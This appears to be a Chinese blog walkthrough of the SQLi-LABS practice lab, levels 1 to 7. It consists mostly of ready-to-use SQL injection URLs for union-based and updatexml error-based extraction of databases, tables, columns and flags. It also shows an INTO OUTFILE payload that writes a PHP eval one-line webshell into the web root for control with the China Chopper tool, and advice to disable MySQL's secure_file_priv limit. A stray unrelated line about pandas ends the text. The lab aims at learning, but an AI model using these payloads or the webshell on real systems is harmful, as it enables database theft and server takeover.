SQL注入天书SQLi-LABS（Less1-7）

往期回顾：
SQLi-LABS搭建教程：SQL注入天书（SQLi-LABS）搭建

文章目录

SQL注入天书SQLi-LABS（Less1-7）
一、SQL注入天书SQLi-LABS
- （一）Less-1
- （二）Less-2
- （三）Less-3
- （三）Less-4
- （三）Less-5
- （三）Less-6
- （三）Less-7

一、SQL注入天书SQLi-LABS

（一）Less-1

1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ order by 3 %23
2、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,3 %23
3、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(schema_name) from information_schema.schemata %23

4、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = ‘flag’ %23

5、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(column_name) from information_schema.columns where table_name= ‘flag’%23

6、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(flag) from flag.flag %23

此题后无特殊情况不再截图，只呈现注入过程。

（二）Less-2

1、http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3 %23
2、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 %23
3、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
4、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = ‘flag’ %23
5、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name= ‘flag’%23
6、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(flag) from flag.flag %23

（三）Less-3

1、http://127.0.0.1/sqli-labs/Less-3/?id=1’) order by 3 %23
2、 http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,2,3 %23
3、 http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
4、http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = ‘flag’ %23
5、http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(column_name) from information_schema.columns where table_name= ‘flag’%23
6、http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(flag) from flag.flag %23

（三）Less-4

这道题和上面的Less-3相似，本题为双引号“加）
http://127.0.0.1/sqli-labs/Less-4/?id=1") order by 3 %23
后面步骤一样

（三）Less-5

这道题当请求正确的时候不显示其他的东西，因此只能保持注入，updatexml不太明白的百度一下。

1、http://127.0.0.1/sqli-labs/Less-5/?id=1’ and updatexml(1,concat(’%7e’,(select group_concat(schema_name) from information_schema.schemata),’%7e’),1) %23
2、http://127.0.0.1/sqli-labs/Less-5/?id=1’ and updatexml(1,concat(’%7e’,(select group_concat(table_name) from information_schema.tables where table_schema=‘flag’),’%7e’),1) %23
3、爆列
4、显示flag
后面的语句同上。

（三）Less-6

本题和Less-5相似，本题是”号

1、http://127.0.0.1/sqli-labs/Less-6/?id=1" and updatexml(1,concat(’%7e’,(select group_concat(schema_name) from information_schema.schemata),’%7e’),1) %23
2、后面的步骤同上一题。

（三）Less-7

该题很实用。但是phpstudy的mysql没有给secure_file_priv的值。因此需要配置一下，才能完美做出此题。
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1、当secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出
2、当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下
3、当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制
在mysql文件下修改my.ini文件，最后加入：secure_file_priv=""

1、http://127.0.0.1/sqli-labs/Less-7/?id=1’)) order by 3 %23
2、http://127.0.0.1/sqli-labs/Less-7/?id=1’)) union select 1,2,3 into outfile “D:\Teachings\Learning_v2.0\WWW\sqli-labs\Less-7\123.txt” %23
此时就在less-7文件下导出一个123.txt文件，可以直接网页访问数据了。后面的步骤就是上面的基本操作，导出数据慢慢看。

本题可以导出一句话木马。

http://127.0.0.1/sqli-labs/Less-7/?id=1’)) union select 1,2,"<?php @eval($_POST[value]);?>" into outfile “D:\Teachings\Learning_v2.0\WWW\sqli-labs\Less-7\123.php” %23
然后菜刀直接链接。

示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。